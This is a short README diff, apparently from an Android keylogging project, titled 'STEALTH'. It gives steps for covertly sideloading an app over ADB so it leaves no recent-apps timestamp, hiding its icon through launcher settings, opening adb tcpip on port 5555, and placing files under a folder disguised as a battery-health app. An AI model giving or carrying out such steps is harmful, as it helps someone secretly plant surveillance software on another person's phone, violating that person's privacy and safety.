NullPounce/pounce-keys/README.md

 # STEALTH
 TIP! install via ADB to avoid recent apps timestamp, also settings does not show in this list, also to assure hiden icon in some cases
+UPDATE: if all fails try long pressing the home screen to open launcher settings for a hide apps option.

 1. have a device with adb setup in a terminal and run adb tcpip 5555 with a phone charger plugged in (also have the stealth apk ready in same dir)
 2. make a new folder on the adb pc with this structure com.BatteryHealth/files/keys/fix.dat